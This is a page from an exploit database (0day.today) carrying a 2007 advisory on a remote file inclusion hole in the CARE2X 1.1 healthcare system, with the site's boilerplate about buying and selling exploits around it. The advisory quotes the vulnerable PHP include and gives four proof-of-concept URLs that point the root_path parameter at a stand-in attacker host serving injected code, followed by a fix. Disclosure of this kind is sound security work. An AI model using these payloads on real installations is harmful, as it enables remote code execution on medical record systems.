0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
CARE2X 1.1 (root_path) Remote File Inclusion Vulnerability
========================================================== CARE2X 1.1 (root_path) Remote File Inclusion Vulnerability ========================================================== ____________________ ___ ___ ________ \_ _____/\_ ___ \ / | \\_____ \ | __)_ / \ \// ~ \/ | \ | \\ \___\ Y / | \ /_______ / \______ /\___|_ /\_______ / \/ \/ \/ \/ .OR.ID ECHO_ADV_72$2007 ------------------------------------------------------------------------- [ECHO_ADV_72$2007] CARE2X (root_path) Remote File Inclusion Vulnerability -------------------------- ---------------------------------------------- Author : Dedi Dwianto a.k.a the_day Date Found : March, 13th 2007 Location : Indonesia, Jakarta Critical Lvl : Highly critical Impact : System access Where : From Remote --------------------------------------------------------------------------- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : CARE2X version : 1.1 URL : http://www.care2x.org Care2x integrates data, functions and workflows in a healthcare environment. It is currently composed of four major components. Each of these components can also function individually. --------------------------------------------------------------------------- Vulnerability: ~~~~~~~~~~~~~ - Invalid include_once function at include/inc_checkdate_lang.php -----------------------include/inc_checkdate_lang.php------------ <? if(file_exists($root_path."language/$lang/lang_".$lang."_checkdate.php")) include_once($root_path."language/$lang/lang_".$lang."_checkdate.php"); else include_once($root_path."language/en/lang_en_checkdate.php"); if(file_exists($root_path."language/$lang/lang_".$lang."_date_time.php")) include_once($root_path."language/$lang/lang_".$lang."_date_time.php"); else include_once($root_path."language/en/lang_en_date_time.php"); ?> ---------------------------------------------------------- Input passed to the "$root_path" parameter in inc_checkdate_lang.php is not properly verified before being used. This can be exploited to execute arbitrary PHP code by including files from local or external resources. also affected files : include/inc_charset_fx.php include/inc_config_color.php include/inc_currency_set.php include/inc_db_makelink.php include/inc_diagnostics_report_fx.php include/inc_environment_global.php include/inc_front_chain_lang.php include/inc_init_crypt.php include/inc_load_copyrite.php include/inc_news_save.php main/barcode-labels.php main/chg-color.php main/config_options_gui_template.php main/config_options_mascot.php main/diagnostics-report-index.php and More .... Proof Of Concept: ~~~~~~~~~~~~~~ http://localhost/care2x/include/inc_checkdate_lang.php?root_path=http://atacker.com/inject.txt? http://localhost/care2x/include/inc_news_save.php?root_path=http://atacker.com/inject.txt? http://localhost/care2x/main/diagnostics-report-index.php?root_path=http://atacker.com/inject.txt? http://localhost/care2x/main/config_options_mascot.php?root_path=http://atacker.com/inject.txt? Solution: ~~~~~~ - Sanitize variable $root_path affected files. - Turn off register_globals --------------------------------------------------------------------------- Shoutz: ~~ ~ y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous ~ Jessy Nice Girl ~ az001,bomm_3x,matdhule,angelia -------------------------------- [ EOF ]---------------------------------- # 0day.today [2024-11-15] #